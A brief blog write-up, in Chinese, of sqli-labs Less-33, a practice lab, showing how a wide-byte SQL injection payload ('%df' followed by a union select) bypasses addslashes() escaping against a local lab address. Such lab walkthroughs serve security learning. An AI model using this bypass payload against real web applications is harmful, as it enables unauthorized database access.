【sqli-labs】 less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

和less32一样,对关键字符进行了添加\

关于addslashes()函数

 payload和less32一样

http://192.168.136.128/sqli-labs-master/Less-33/?id=0%df' union select 1,2,3%23

 

posted @   omnis  阅读(678)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示